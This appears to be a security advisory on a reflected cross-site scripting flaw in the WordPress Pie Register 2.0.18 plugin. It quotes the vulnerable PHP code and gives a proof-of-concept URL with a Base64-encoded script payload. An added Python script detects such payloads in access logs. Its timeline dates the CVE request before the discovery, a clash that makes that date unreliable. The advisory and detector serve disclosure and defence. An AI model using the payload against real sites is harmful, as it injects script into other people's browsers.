WordPress Pie Register 2.0.18 Cross Site Scripting

Source: packetstormsecurity.com (PACKETSTORM:133928)
Author: David Moore
Published: 2015-10-12
EPSS: 0.002 (percentile 61.5%)

Details  
================  
Software: Pie Register  
Version: 2.0.18  
Homepage: https://github.com/GTSolutions/Pie-Register  
CVE: CVE-2015-7377 (Pending)  
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)  
CWE: CWE-79  
  
Description  
================  
An unauthenticated reflected XSS vulnerability in Pie Register 2.0.18 allows malicious script injection via the invitaion_code parameter. Pie Register is a WordPress plugin with over 10,000 active installs.  
  
Vulnerability  
================  
The vulnerability is due to the GET parameter invitaion_code being Base64-decoded and then echoed into the page without any sanitization or output escaping:  
  
From: pie-register/pie-register.php:  
647: $inv_code = base64_decode($_GET['invitaion_code']);  
. . .  
662: <h2><?php _e("Activation Code","piereg");echo " : ".$inv_code; ?></h2>  
  
Proof of concept  
================  
The payload (<script>alert(1)</script>) is Base64 encoded in the URL, since the plugin decodes the parameter before echoing it.  
  
http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==  
  
Tested on Firefox 41.0 and Chrome 45.0.2454.85.  
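As an added detection example, not part of the original advisory: because the plugin Base64-decodes the parameter server-side, a log search for the literal string <script> will not find this payload. The script below decodes invitaion_code values from constructed access-log lines the way PHP's default non-strict base64_decode() does (skipping characters outside the Base64 alphabet) and flags any value that decodes to HTML markup.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines (Common Log Format); not real traffic.
# The first line carries the advisory's own PoC value, URL-encoded as a browser sends it.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2015:10:01:02 +0000] "GET /wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D HTTP/1.1" 200 5120
10.0.0.6 - - [12/Oct/2015:10:01:09 +0000] "GET /wordpress/?page=pie-register&invitaion_code=QUJDLTEyMzQ%3D HTTP/1.1" 200 4990
10.0.0.7 - - [12/Oct/2015:10:02:15 +0000] "GET /wordpress/?page=pie-register&invitaion_code=not-base64!! HTTP/1.1" 200 4990
10.0.0.8 - - [12/Oct/2015:10:03:00 +0000] "GET /wordpress/ HTTP/1.1" 200 3000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
NOT_B64_RE = re.compile(r"[^A-Za-z0-9+/]")
# The value is echoed into HTML body context, so a '<' that opens a tag is the trigger.
MARKUP_RE = re.compile(r"<[A-Za-z!/?]")


def decode_like_php(raw: str) -> bytes:
    """Mimic PHP base64_decode() in its default non-strict mode: characters
    outside the Base64 alphabet are skipped, so junk characters cannot be
    used to hide a payload from the decoder. Returns b'' when undecodable."""
    value = NOT_B64_RE.sub("", unquote(raw))
    value += "=" * (-len(value) % 4)  # re-pad after stripping '=' and junk
    try:
        return base64.b64decode(value)
    except binascii.Error:
        return b""


def suspicious_requests(log_text: str) -> list:
    """Return (client_ip, decoded_payload) for every request whose decoded
    invitaion_code parameter contains HTML markup."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlparse(match.group(1)).query
        for raw in parse_qs(query).get("invitaion_code", []):
            text = decode_like_php(raw).decode("utf-8", errors="replace")
            if MARKUP_RE.search(text):
                hits.append((line.split()[0], text))
    return hits


if __name__ == "__main__":
    for ip, payload in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent decoded invitaion_code {payload!r}")
```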
  
Remediation  
================  
Upgrade the plugin to version 2.0.19.  
  
Timeline  
================  
2015-09-23: Discovered  
2015-09-24: Contacted vendor via website support form  
2015-08-24: Requested CVE  
2015-09-28: Vendor supplied security contact email  
2015-09-30: Report sent to vendor and wordpress.org  
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed  
2015-10-12: Public Disclosure  
  
References  
================  
[1] http://codex.wordpress.org/Data_Validation  
  
Discovered by  
================  
David Moore @grajagandev  
